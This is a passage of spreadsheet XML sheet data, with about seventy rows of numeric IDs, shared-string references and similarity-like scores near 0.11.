        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26741" ht="15.75" customHeight="1">
      <c r="A26741" s="1">
        <v>24695.0</v>
      </c>
      <c r="B26741" s="2">
        <v>1.1630585E7</v>
      </c>
      <c r="C26741" s="2" t="s">
        <v>25713</v>
      </c>
      <c r="D26741" s="2">
        <v>1.0</v>
      </c>
      <c r="E26741" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26741" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26742" ht="15.75" customHeight="1">
      <c r="A26742" s="1">
        <v>24739.0</v>
      </c>
      <c r="B26742" s="2">
        <v>1.1784318E7</v>
      </c>
      <c r="C26742" s="2" t="s">
        <v>25687</v>
      </c>
      <c r="D26742" s="2">
        <v>1.0</v>
      </c>
      <c r="E26742" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26742" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26743" ht="15.75" customHeight="1">
      <c r="A26743" s="1">
        <v>24801.0</v>
      </c>
      <c r="B26743" s="2">
        <v>1.2012501E7</v>
      </c>
      <c r="C26743" s="2" t="s">
        <v>25714</v>
      </c>
      <c r="D26743" s="2">
        <v>1.0</v>
      </c>
      <c r="E26743" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26743" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26744" ht="15.75" customHeight="1">
      <c r="A26744" s="1">
        <v>25230.0</v>
      </c>
      <c r="B26744" s="2">
        <v>1.3344749E7</v>
      </c>
      <c r="C26744" s="2" t="s">
        <v>25715</v>
      </c>
      <c r="D26744" s="2">
        <v>1.0</v>
      </c>
      <c r="E26744" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26744" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26745" ht="15.75" customHeight="1">
      <c r="A26745" s="1">
        <v>25416.0</v>
      </c>
      <c r="B26745" s="2">
        <v>1.3797436E7</v>
      </c>
      <c r="C26745" s="2" t="s">
        <v>1539</v>
      </c>
      <c r="D26745" s="2">
        <v>1.0</v>
      </c>
      <c r="E26745" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26745" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26746" ht="15.75" customHeight="1">
      <c r="A26746" s="1">
        <v>26147.0</v>
      </c>
      <c r="B26746" s="2">
        <v>1.6045483E7</v>
      </c>
      <c r="C26746" s="2" t="s">
        <v>25716</v>
      </c>
      <c r="D26746" s="2">
        <v>1.0</v>
      </c>
      <c r="E26746" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26746" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26747" ht="15.75" customHeight="1">
      <c r="A26747" s="1">
        <v>26174.0</v>
      </c>
      <c r="B26747" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C26747" s="2" t="s">
        <v>25690</v>
      </c>
      <c r="D26747" s="2">
        <v>1.0</v>
      </c>
      <c r="E26747" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26747" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26748" ht="15.75" customHeight="1">
      <c r="A26748" s="1">
        <v>26354.0</v>
      </c>
      <c r="B26748" s="2">
        <v>1.6815735E7</v>
      </c>
      <c r="C26748" s="2" t="s">
        <v>25717</v>
      </c>
      <c r="D26748" s="2">
        <v>1.0</v>
      </c>
      <c r="E26748" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26748" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26749" ht="15.75" customHeight="1">
      <c r="A26749" s="1">
        <v>26437.0</v>
      </c>
      <c r="B26749" s="2">
        <v>1.7243562E7</v>
      </c>
      <c r="C26749" s="2" t="s">
        <v>25718</v>
      </c>
      <c r="D26749" s="2">
        <v>1.0</v>
      </c>
      <c r="E26749" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26749" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26750" ht="15.75" customHeight="1">
      <c r="A26750" s="1">
        <v>26465.0</v>
      </c>
      <c r="B26750" s="2">
        <v>1.7344509E7</v>
      </c>
      <c r="C26750" s="2" t="s">
        <v>25719</v>
      </c>
      <c r="D26750" s="2">
        <v>1.0</v>
      </c>
      <c r="E26750" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26750" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26751" ht="15.75" customHeight="1">
      <c r="A26751" s="1">
        <v>26887.0</v>
      </c>
      <c r="B26751" s="2">
        <v>1.9207085E7</v>
      </c>
      <c r="C26751" s="2" t="s">
        <v>25720</v>
      </c>
      <c r="D26751" s="2">
        <v>1.0</v>
      </c>
      <c r="E26751" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26751" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26752" ht="15.75" customHeight="1">
      <c r="A26752" s="1">
        <v>26944.0</v>
      </c>
      <c r="B26752" s="2">
        <v>1.9558815E7</v>
      </c>
      <c r="C26752" s="2" t="s">
        <v>25721</v>
      </c>
      <c r="D26752" s="2">
        <v>1.0</v>
      </c>
      <c r="E26752" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26752" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26753" ht="15.75" customHeight="1">
      <c r="A26753" s="1">
        <v>27261.0</v>
      </c>
      <c r="B26753" s="2">
        <v>2.1161357E7</v>
      </c>
      <c r="C26753" s="2" t="s">
        <v>25722</v>
      </c>
      <c r="D26753" s="2">
        <v>1.0</v>
      </c>
      <c r="E26753" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26753" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26754" ht="15.75" customHeight="1">
      <c r="A26754" s="1">
        <v>27663.0</v>
      </c>
      <c r="B26754" s="2">
        <v>2.2914161E7</v>
      </c>
      <c r="C26754" s="2" t="s">
        <v>25723</v>
      </c>
      <c r="D26754" s="2">
        <v>1.0</v>
      </c>
      <c r="E26754" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26754" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26755" ht="15.75" customHeight="1">
      <c r="A26755" s="1">
        <v>27779.0</v>
      </c>
      <c r="B26755" s="2">
        <v>2.3121278E7</v>
      </c>
      <c r="C26755" s="2" t="s">
        <v>25724</v>
      </c>
      <c r="D26755" s="2">
        <v>1.0</v>
      </c>
      <c r="E26755" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26755" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26756" ht="15.75" customHeight="1">
      <c r="A26756" s="1">
        <v>29119.0</v>
      </c>
      <c r="B26756" s="2">
        <v>3.0454079E7</v>
      </c>
      <c r="C26756" s="2" t="s">
        <v>25725</v>
      </c>
      <c r="D26756" s="2">
        <v>1.0</v>
      </c>
      <c r="E26756" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26756" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26757" ht="15.75" customHeight="1">
      <c r="A26757" s="1">
        <v>29178.0</v>
      </c>
      <c r="B26757" s="2">
        <v>3.0708875E7</v>
      </c>
      <c r="C26757" s="2" t="s">
        <v>25726</v>
      </c>
      <c r="D26757" s="2">
        <v>1.0</v>
      </c>
      <c r="E26757" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26757" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26758" ht="15.75" customHeight="1">
      <c r="A26758" s="1">
        <v>29260.0</v>
      </c>
      <c r="B26758" s="2">
        <v>3.0976302E7</v>
      </c>
      <c r="C26758" s="2" t="s">
        <v>25727</v>
      </c>
      <c r="D26758" s="2">
        <v>1.0</v>
      </c>
      <c r="E26758" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26758" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26759" ht="15.75" customHeight="1">
      <c r="A26759" s="1">
        <v>29360.0</v>
      </c>
      <c r="B26759" s="2">
        <v>3.1649546E7</v>
      </c>
      <c r="C26759" s="2" t="s">
        <v>25658</v>
      </c>
      <c r="D26759" s="2">
        <v>1.0</v>
      </c>
      <c r="E26759" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26759" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26760" ht="15.75" customHeight="1">
      <c r="A26760" s="1">
        <v>30172.0</v>
      </c>
      <c r="B26760" s="2">
        <v>3.713624E7</v>
      </c>
      <c r="C26760" s="2" t="s">
        <v>25728</v>
      </c>
      <c r="D26760" s="2">
        <v>1.0</v>
      </c>
      <c r="E26760" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26760" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26761" ht="15.75" customHeight="1">
      <c r="A26761" s="1">
        <v>30252.0</v>
      </c>
      <c r="B26761" s="2">
        <v>3757584.0</v>
      </c>
      <c r="C26761" s="2" t="s">
        <v>25719</v>
      </c>
      <c r="D26761" s="2">
        <v>1.0</v>
      </c>
      <c r="E26761" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26761" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26762" ht="15.75" customHeight="1">
      <c r="A26762" s="1">
        <v>30630.0</v>
      </c>
      <c r="B26762" s="2">
        <v>4.1371428E7</v>
      </c>
      <c r="C26762" s="2" t="s">
        <v>25729</v>
      </c>
      <c r="D26762" s="2">
        <v>1.0</v>
      </c>
      <c r="E26762" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26762" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26763" ht="15.75" customHeight="1">
      <c r="A26763" s="1">
        <v>30636.0</v>
      </c>
      <c r="B26763" s="2">
        <v>4.14655E7</v>
      </c>
      <c r="C26763" s="2" t="s">
        <v>25730</v>
      </c>
      <c r="D26763" s="2">
        <v>1.0</v>
      </c>
      <c r="E26763" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26763" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26764" ht="15.75" customHeight="1">
      <c r="A26764" s="1">
        <v>30698.0</v>
      </c>
      <c r="B26764" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C26764" s="2" t="s">
        <v>25731</v>
      </c>
      <c r="D26764" s="2">
        <v>1.0</v>
      </c>
      <c r="E26764" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26764" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26765" ht="15.75" customHeight="1">
      <c r="A26765" s="1">
        <v>31012.0</v>
      </c>
      <c r="B26765" s="2">
        <v>4771280.0</v>
      </c>
      <c r="C26765" s="2" t="s">
        <v>25732</v>
      </c>
      <c r="D26765" s="2">
        <v>1.0</v>
      </c>
      <c r="E26765" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26765" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26766" ht="15.75" customHeight="1">
      <c r="A26766" s="1">
        <v>31057.0</v>
      </c>
      <c r="B26766" s="2">
        <v>4.7989201E7</v>
      </c>
      <c r="C26766" s="2" t="s">
        <v>25733</v>
      </c>
      <c r="D26766" s="2">
        <v>1.0</v>
      </c>
      <c r="E26766" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26766" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26767" ht="15.75" customHeight="1">
      <c r="A26767" s="1">
        <v>31490.0</v>
      </c>
      <c r="B26767" s="2">
        <v>5.0620841E7</v>
      </c>
      <c r="C26767" s="2" t="s">
        <v>25719</v>
      </c>
      <c r="D26767" s="2">
        <v>1.0</v>
      </c>
      <c r="E26767" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26767" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26768" ht="15.75" customHeight="1">
      <c r="A26768" s="1">
        <v>31710.0</v>
      </c>
      <c r="B26768" s="2">
        <v>5203456.0</v>
      </c>
      <c r="C26768" s="2" t="s">
        <v>25734</v>
      </c>
      <c r="D26768" s="2">
        <v>1.0</v>
      </c>
      <c r="E26768" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26768" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26769" ht="15.75" customHeight="1">
      <c r="A26769" s="1">
        <v>31877.0</v>
      </c>
      <c r="B26769" s="2">
        <v>5286155.0</v>
      </c>
      <c r="C26769" s="2" t="s">
        <v>25735</v>
      </c>
      <c r="D26769" s="2">
        <v>1.0</v>
      </c>
      <c r="E26769" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26769" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26770" ht="15.75" customHeight="1">
      <c r="A26770" s="1">
        <v>32133.0</v>
      </c>
      <c r="B26770" s="2">
        <v>5.4124275E7</v>
      </c>
      <c r="C26770" s="2" t="s">
        <v>25736</v>
      </c>
      <c r="D26770" s="2">
        <v>1.0</v>
      </c>
      <c r="E26770" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26770" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26771" ht="15.75" customHeight="1">
      <c r="A26771" s="1">
        <v>32581.0</v>
      </c>
      <c r="B26771" s="2">
        <v>5783602.0</v>
      </c>
      <c r="C26771" s="2" t="s">
        <v>25737</v>
      </c>
      <c r="D26771" s="2">
        <v>1.0</v>
      </c>
      <c r="E26771" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26771" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26772" ht="15.75" customHeight="1">
      <c r="A26772" s="1">
        <v>32796.0</v>
      </c>
      <c r="B26772" s="2">
        <v>6148949.0</v>
      </c>
      <c r="C26772" s="2" t="s">
        <v>25738</v>
      </c>
      <c r="D26772" s="2">
        <v>1.0</v>
      </c>
      <c r="E26772" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26772" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26773" ht="15.75" customHeight="1">
      <c r="A26773" s="1">
        <v>33212.0</v>
      </c>
      <c r="B26773" s="2">
        <v>7208869.0</v>
      </c>
      <c r="C26773" s="2" t="s">
        <v>25705</v>
      </c>
      <c r="D26773" s="2">
        <v>1.0</v>
      </c>
      <c r="E26773" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26773" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26774" ht="15.75" customHeight="1">
      <c r="A26774" s="1">
        <v>33384.0</v>
      </c>
      <c r="B26774" s="2">
        <v>7652284.0</v>
      </c>
      <c r="C26774" s="2" t="s">
        <v>25739</v>
      </c>
      <c r="D26774" s="2">
        <v>1.0</v>
      </c>
      <c r="E26774" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26774" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26775" ht="15.75" customHeight="1">
      <c r="A26775" s="1">
        <v>33775.0</v>
      </c>
      <c r="B26775" s="2">
        <v>8674953.0</v>
      </c>
      <c r="C26775" s="2" t="s">
        <v>25706</v>
      </c>
      <c r="D26775" s="2">
        <v>1.0</v>
      </c>
      <c r="E26775" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26775" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26776" ht="15.75" customHeight="1">
      <c r="A26776" s="1">
        <v>34001.0</v>
      </c>
      <c r="B26776" s="2">
        <v>9457952.0</v>
      </c>
      <c r="C26776" s="2" t="s">
        <v>25708</v>
      </c>
      <c r="D26776" s="2">
        <v>1.0</v>
      </c>
      <c r="E26776" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26776" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26777" ht="15.75" customHeight="1">
      <c r="A26777" s="1">
        <v>34004.0</v>
      </c>
      <c r="B26777" s="2">
        <v>9484883.0</v>
      </c>
      <c r="C26777" s="2" t="s">
        <v>25711</v>
      </c>
      <c r="D26777" s="2">
        <v>1.0</v>
      </c>
      <c r="E26777" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26777" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26778" ht="15.75" customHeight="1">
      <c r="A26778" s="1">
        <v>34015.0</v>
      </c>
      <c r="B26778" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C26778" s="2" t="s">
        <v>25740</v>
      </c>
      <c r="D26778" s="2">
        <v>1.0</v>
      </c>
      <c r="E26778" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26778" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26779" ht="15.75" customHeight="1">
      <c r="A26779" s="1">
        <v>7461.0</v>
      </c>
      <c r="B26779" s="2">
        <v>5.1251226E7</v>
      </c>
      <c r="C26779" s="2" t="s">
        <v>25741</v>
      </c>
      <c r="D26779" s="2">
        <v>1.0</v>
      </c>
      <c r="E26779" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26779" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="26780" ht="15.75" customHeight="1">
      <c r="A26780" s="1">
        <v>22069.0</v>
      </c>
      <c r="B26780" s="2">
        <v>3.0581793E7</v>
      </c>
      <c r="C26780" s="2" t="s">
        <v>25742</v>
      </c>
      <c r="D26780" s="2">
        <v>1.0</v>
      </c>
      <c r="E26780" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26780" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="26781" ht="15.75" customHeight="1">
      <c r="A26781" s="1">
        <v>30818.0</v>
      </c>
      <c r="B26781" s="2">
        <v>4536663.0</v>
      </c>
      <c r="C26781" s="2" t="s">
        <v>25743</v>
      </c>
      <c r="D26781" s="2">
        <v>1.0</v>
      </c>
      <c r="E26781" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26781" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="26782" ht="15.75" customHeight="1">
      <c r="A26782" s="1">
        <v>29167.0</v>
      </c>
      <c r="B26782" s="2">
        <v>3.0627426E7</v>
      </c>
      <c r="C26782" s="2" t="s">
        <v>25744</v>
      </c>
      <c r="D26782" s="2">
        <v>1.0</v>
      </c>
      <c r="E26782" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26782" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="26783" ht="15.75" customHeight="1">
      <c r="A26783" s="1">
        <v>34048.0</v>
      </c>
      <c r="B26783" s="2">
        <v>9577485.0</v>
      </c>
      <c r="C26783" s="2" t="s">
        <v>25745</v>
      </c>
      <c r="D26783" s="2">
        <v>1.0</v>
      </c>
      <c r="E26783" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26783" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="26784" ht="15.75" customHeight="1">
      <c r="A26784" s="1">
        <v>10212.0</v>
      </c>
      <c r="B26784" s="2">
        <v>5.7430102E7</v>
      </c>
      <c r="C26784" s="2" t="s">
        <v>25746</v>
      </c>
      <c r="D26784" s="2">
        <v>1.0</v>
      </c>
      <c r="E26784" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26784" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="26785" ht="15.75" customHeight="1">
      <c r="A26785" s="1">
        <v>10810.0</v>
      </c>
      <c r="B26785" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C26785" s="2" t="s">
        <v>25747</v>
      </c>
      <c r="D26785" s="2">
        <v>1.0</v>
      </c>
      <c r="E26785" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26785" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="26786" ht="15.75" customHeight="1">
      <c r="A26786" s="1">
        <v>11142.0</v>
      </c>
      <c r="B26786" s="2">
        <v>1.9332619E7</v>
      </c>
      <c r="C26786" s="2" t="s">
        <v>25748</v>
      </c>
      <c r="D26786" s="2">
        <v>1.0</v>
      </c>
      <c r="E26786" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26786" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="26787" ht="15.75" customHeight="1">
      <c r="A26787" s="1">
        <v>14047.0</v>
      </c>
      <c r="B26787" s="2">
        <v>3.7508196E7</v>
      </c>
      <c r="C26787" s="2" t="s">
        <v>25749</v>
      </c>
      <c r="D26787" s="2">
        <v>1.0</v>
      </c>
      <c r="E26787" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26787" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="26788" ht="15.75" customHeight="1">
      <c r="A26788" s="1">
        <v>25917.0</v>
      </c>
      <c r="B26788" s="2">
        <v>1.5142918E7</v>
      </c>
      <c r="C26788" s="2" t="s">
        <v>25750</v>
      </c>
      <c r="D26788" s="2">
        <v>1.0</v>
      </c>
      <c r="E26788" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26788" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="26789" ht="15.75" customHeight="1">
      <c r="A26789" s="1">
        <v>15315.0</v>
      </c>
      <c r="B26789" s="2">
        <v>4.2505877E7</v>
      </c>
      <c r="C26789" s="2" t="s">
        <v>25751</v>
      </c>
      <c r="D26789" s="2">
        <v>1.0</v>
      </c>
      <c r="E26789" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26789" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="26790" ht="15.75" customHeight="1">
      <c r="A26790" s="1">
        <v>18655.0</v>
      </c>
      <c r="B26790" s="2">
        <v>5.3481928E7</v>
      </c>
      <c r="C26790" s="2" t="s">
        <v>25752</v>
      </c>
      <c r="D26790" s="2">
        <v>1.0</v>
      </c>
      <c r="E26790" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26790" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="26791" ht="15.75" customHeight="1">
      <c r="A26791" s="1">
        <v>23794.0</v>
      </c>
      <c r="B26791" s="2">
        <v>7743514.0</v>
      </c>
      <c r="C26791" s="2" t="s">
        <v>25753</v>
      </c>
      <c r="D26791" s="2">
        <v>1.0</v>
      </c>
      <c r="E26791" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26791" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="26792" ht="15.75" customHeight="1">
      <c r="A26792" s="1">
        <v>25070.0</v>
      </c>
      <c r="B26792" s="2">
        <v>1.2875858E7</v>
      </c>
      <c r="C26792" s="2" t="s">
        <v>25754</v>
      </c>
      <c r="D26792" s="2">
        <v>1.0</v>
      </c>
      <c r="E26792" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26792" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="26793" ht="15.75" customHeight="1">
      <c r="A26793" s="1">
        <v>25637.0</v>
      </c>
      <c r="B26793" s="2">
        <v>1.4489515E7</v>
      </c>
      <c r="C26793" s="2" t="s">
        <v>25755</v>
      </c>
      <c r="D26793" s="2">
        <v>1.0</v>
      </c>
      <c r="E26793" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26793" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="26794" ht="15.75" customHeight="1">
      <c r="A26794" s="1">
        <v>25100.0</v>
      </c>
      <c r="B26794" s="2">
        <v>1.2943315E7</v>
      </c>
      <c r="C26794" s="2" t="s">
        <v>25756</v>
      </c>
      <c r="D26794" s="2">
        <v>1.0</v>
      </c>
      <c r="E26794" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26794" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="26795" ht="15.75" customHeight="1">
      <c r="A26795" s="1">
        <v>31062.0</v>
      </c>
      <c r="B26795" s="2">
        <v>4.801869E7</v>
      </c>
      <c r="C26795" s="2" t="s">
        <v>25757</v>
      </c>
      <c r="D26795" s="2">
        <v>1.0</v>
      </c>
      <c r="E26795" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26795" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="26796" ht="15.75" customHeight="1">
      <c r="A26796" s="1">
        <v>24858.0</v>
      </c>
      <c r="B26796" s="2">
        <v>1.2207463E7</v>
      </c>
      <c r="C26796" s="2" t="s">
        <v>25758</v>
      </c>
      <c r="D26796" s="2">
        <v>1.0</v>
      </c>
      <c r="E26796" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26796" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="26797" ht="15.75" customHeight="1">
      <c r="A26797" s="1">
        <v>26391.0</v>
      </c>
      <c r="B26797" s="2">
        <v>1.7000246E7</v>
      </c>
      <c r="C26797" s="2" t="s">
        <v>25759</v>
      </c>
      <c r="D26797" s="2">
        <v>1.0</v>
      </c>
      <c r="E26797" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26797" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="26798" ht="15.75" customHeight="1">
      <c r="A26798" s="1">
        <v>8336.0</v>
      </c>
      <c r="B26798" s="2">
        <v>5.3695243E7</v>
      </c>
      <c r="C26798" s="2" t="s">
        <v>25760</v>
      </c>
      <c r="D26798" s="2">
        <v>1.0</v>
      </c>
      <c r="E26798" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26798" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="26799" ht="15.75" customHeight="1">
      <c r="A26799" s="1">
        <v>18732.0</v>
      </c>
      <c r="B26799" s="2">
        <v>5.37135E7</v>
      </c>
      <c r="C26799" s="2" t="s">
        <v>25761</v>
      </c>
      <c r="D26799" s="2">
        <v>1.0</v>
      </c>
      <c r="E26799" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26799" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="26800" ht="15.75" customHeight="1">
      <c r="A26800" s="1">
        <v>23206.0</v>
      </c>
      <c r="B26800" s="2">
        <v>5256444.0</v>
      </c>
      <c r="C26800" s="2" t="s">
        <v>25762</v>
      </c>
      <c r="D26800" s="2">
        <v>1.0</v>
      </c>
      <c r="E26800" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26800" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="26801" ht="15.75" customHeight="1">
      <c r="A26801" s="1">
        <v>25270.0</v>
      </c>
      <c r="B26801" s="2">
        <v>1.3394859E7</v>
      </c>
      <c r="C26801" s="2" t="s">
        <v>25763</v>
      </c>
      <c r="D26801" s="2">
        <v>1.0</v>
      </c>
      <c r="E26801" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26801" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="26802" ht="15.75" customHeight="1">
      <c r="A26802" s="1">
        <v>20114.0</v>
      </c>
      <c r="B26802" s="2">
        <v>4919595.0</v>
      </c>
      <c r="C26802" s="2" t="s">
        <v>25764</v>
      </c>
      <c r="D26802" s="2">
        <v>1.0</v>
      </c>
      <c r="E26802" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26802" s="2">
        <v>0.1102693602693603</v>
      </c>
    </row>
    <row r="26803" ht="15.75" customHeight="1">
      <c r="A26803" s="1">
        <v>10598.0</v>
      </c>
      <c r="B26803" s="2">
        <v>1.3597133E7</v>
      </c>
      <c r="C26803" s="2" t="s">
        <v>25765</v>
      </c>
      <c r="D26803" s="2">
        <v>1.0</v>
      </c>
      <c r="E26803" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26803" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="26804" ht="15.75" customHeight="1">
      <c r="A26804" s="1">
        <v>15873.0</v>
      </c>
      <c r="B26804" s="2">
        <v>4.4503531E7</v>
      </c>
      <c r="C26804" s="2" t="s">
        <v>25766</v>
      </c>
      <c r="D26804" s="2">
        <v>1.0</v>
      </c>
      <c r="E26804" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26804" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="26805" ht="15.75" customHeight="1">
      <c r="A26805" s="1">
        <v>17219.0</v>
      </c>
      <c r="B26805" s="2">
        <v>4.9061649E7</v>
      </c>
      <c r="C26805" s="2" t="s">
        <v>25767</v>
      </c>
      <c r="D26805" s="2">
        <v>1.0</v>
      </c>
      <c r="E26805" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26805" s="2">
        <v>0.1102430555555556</v>
      </c>
    </row>
    <row r="26806" ht="15.75" customHeight="1">
      <c r="A26806" s="1">
        <v>24656.0</v>
      </c>
      <c r="B26806" s="2">
        <v>1.1512449E7</v>
      </c>
      <c r="C26806" s="2" t="s">
        <v>25768</v>
      </c>
      <c r="D26806" s="2">
        <v>1.0</v>
      </c>
      <c r="E26806" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26806" s="2">
        <v>0.1102430555555556</v>
      </c>
    </row>
    <row r="26807" ht="15.75" customHeight="1">
      <c r="A26807" s="1">
        <v>10914.0</v>
      </c>
      <c r="B26807" s="2">
        <v>1671120.0</v>
      </c>
      <c r="C26807" s="2" t="s">
        <v>25769</v>
      </c>
      <c r="D26807" s="2">
        <v>1.0</v>
      </c>
      <c r="E26807" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26807" s="2">
        <v>0.1102292768959436</v>
      </c>
    </row>
